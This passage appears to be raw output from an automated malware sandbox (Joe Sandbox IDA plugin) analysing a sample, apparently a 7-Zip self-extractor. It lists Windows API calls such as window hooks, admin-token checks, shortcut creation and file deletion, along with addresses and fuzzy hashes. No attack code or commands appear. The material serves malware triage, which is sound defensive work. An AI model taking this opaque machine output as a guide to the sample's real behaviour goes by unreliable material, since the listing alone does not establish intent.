                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                    • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                    • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                    • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                    APIs
                                                    • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: FileTime
                                                    • String ID:
                                                    • API String ID: 1425588814-0
                                                    • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                    • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                    • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                    • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@
                                                    • String ID:
                                                    • API String ID: 1033339047-0
                                                    • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                    • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                    • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                    • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??2@
                                                    • String ID:
                                                    • API String ID: 1033339047-0
                                                    • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                    • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                    • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                    • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                    APIs
                                                    • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                    • Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
                                                    • Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
                                                    • Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                    • Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
                                                    • Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
                                                    • Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509
                                                    APIs
                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID:
                                                    • API String ID: 1263568516-0
                                                    • Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                    • Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
                                                    • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                    • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09
                                                    APIs
                                                    • _wtol.MSVCRT ref: 00403882
                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                    • _wtol.MSVCRT ref: 00403A1C
                                                    • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                    • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                    • String ID: .lnk
                                                    • API String ID: 408529070-24824748
                                                    • Opcode ID: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
                                                    • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                    • Opcode Fuzzy Hash: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
                                                    • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                    • wsprintfW.USER32 ref: 004021E7
                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                    • GetLastError.KERNEL32 ref: 00402201
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                    • GetLastError.KERNEL32 ref: 00402236
                                                    • lstrcmpiW.KERNEL32(024B4890,00404926), ref: 0040224B
                                                    • ??3@YAXPAX@Z.MSVCRT(024B4890), ref: 0040225B
                                                    • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                    • SetLastError.KERNEL32(?), ref: 00402282
                                                    • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                    • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                    • _wtol.MSVCRT ref: 00402314
                                                    • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,024B4890,00000002), ref: 00402334
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                    • String ID: 7zSfxString%d
                                                    • API String ID: 2117570002-3906403175
                                                    • Opcode ID: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
                                                    • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                    • Opcode Fuzzy Hash: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
                                                    • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                    • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                    • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                    • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                    • wsprintfW.USER32 ref: 00401E7F
                                                    • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                    • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                    • API String ID: 2639302590-365843014
                                                    • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                    • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                    • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                    • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                    APIs
                                                    • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                    • GetLastError.KERNEL32 ref: 00408DF4
                                                    • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                    • lstrlenW.KERNEL32(?), ref: 00408E44
                                                    • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                    • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                    • LocalFree.KERNEL32(?), ref: 00408E9A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                    • String ID:
                                                    • API String ID: 829399097-0
                                                    • Opcode ID: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
                                                    • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                    • Opcode Fuzzy Hash: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
                                                    • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                    • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                    • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                    • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                    • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                    • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                    • String ID:
                                                    • API String ID: 1862581289-0
                                                    • Opcode ID: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
                                                    • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                    • Opcode Fuzzy Hash: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
                                                    • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                    • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                    • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                    • EndDialog.USER32(?,00000000), ref: 0040869A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: CurrentHookThreadWindows$Dialog
                                                    • String ID:
                                                    • API String ID: 1967849563-0
                                                    • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                    • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                    • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                    • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                    • FreeSid.ADVAPI32(?), ref: 004024A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                    • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                    • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                    • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                    • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                    • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                    • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                    • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                    • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                    • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                    • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                    • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                    • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
